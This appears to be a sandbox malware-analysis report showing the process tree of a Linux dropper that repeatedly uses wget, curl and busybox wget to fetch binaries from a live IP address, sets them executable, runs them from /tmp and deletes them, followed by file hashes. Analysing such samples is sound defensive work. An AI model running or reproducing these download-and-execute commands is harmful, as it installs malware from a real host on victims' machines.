/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1657
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1660
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1663
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1666
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1669
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1672
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1673
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1675
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1678
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1681
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1684
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1685
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Writes file to tmp directory
PID:1686
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1687
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:1688
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:1689
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1690
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97